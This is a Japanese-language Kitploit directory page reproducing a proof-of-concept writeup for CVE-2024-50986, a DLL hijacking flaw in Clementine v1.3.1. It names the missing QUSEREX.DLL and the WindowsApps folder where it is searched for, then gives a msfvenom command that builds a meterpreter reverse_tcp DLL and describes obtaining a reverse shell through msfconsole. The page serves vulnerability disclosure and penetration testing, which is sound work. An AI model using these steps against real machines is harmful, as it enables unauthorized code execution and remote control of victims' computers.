Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-50986 — Clementine v.1.3.1 の脆弱性により、ローカルの攻撃者が細工された DLL ファイル(DLL ハイジャッキング)を介して任意のコードを実行できる可能性があります。 | Kitploit
ツール/GitHubGitHub/riftsandroses/cve-2024-50986
ペイロード生成脆弱性分析エクスプロイトシェルコードポストエクスプロイトペネトレーションテストバイナリエクスプロイト
GitHubriftsandroses/cve-2024-50986

CVE-2024-50986

Clementine v.1.3.1 の脆弱性により、ローカルの攻撃者が細工された DLL ファイル(DLL ハイジャッキング)を介して任意のコードを実行できる可能性があります。

リポジトリを見る
141年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-50986: Clementine 用 DLL ハイジャックエクスプロイト

説明: Clementine v.1.3.1 の問題により、ローカルの攻撃者が細工された DLL ファイルを介して任意のコードを実行できる可能性があります。

影響を受けるバージョン: Clementine v.1.3.1

研究者: Utkarsh (r1971d3) LinkedIn

NIST CVE リンク: https://nvd.nist.gov/vuln/detail/CVE-2024-50986

脆弱性タイプ: 信頼できない検索パス

影響を受けるコンポーネント: QUSEREX.DLL

概念実証エクスプロイト

攻撃ベクトル

この脆弱性を悪用するには、攻撃者は QUSEREX.DLL という名前の悪意のある DLL を作成し、ディレクトリ C:\Users<username>\AppData\Local\Microsoft\WindowsApps\ に配置する必要があります。Clementine アプリケーションが起動されると、悪意のある DLL が読み込まれ、攻撃者のコードが実行されます。

説明と使用方法

  1. 適切なフィルターを設定した Process Monitor (procmon) を使用して、欠落している DLL を特定し、Windows オペレーティングシステム内で Clementine が DLL を検索している場所を追跡します。

Capture_3

  1. 検索により、DLL "QUSEREX.DLL" が C:\Users<username>\AppData\Local\Microsoft\WindowsApps\ を含む複数の場所で検索されていることが明らかになります。

Capture_4

  1. msfvenom を使用して、次のコマンドで悪意のある DLL を作成します。
root@kitploit:~
sudo msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=<IP Address> LPORT=<Port> > QUSEREX.DLL

Capture_5

  1. この悪意のある DLL はディレクトリ C:\Users<username>\AppData\Local\Microsoft\WindowsApps\ に配置され、Clementine によって正常に読み込まれます。

Capture_6

  1. msfconsole を使用して、ステージドペイロードがリバースシェルを介して送信され、その結果、ターゲットマシンの C:\Program Files (x86)\Clementine\projectm-presets ディレクトリで meterpreter シェルセッションが取得されます。

Capture_7

Capture_8

ツールをダウンロード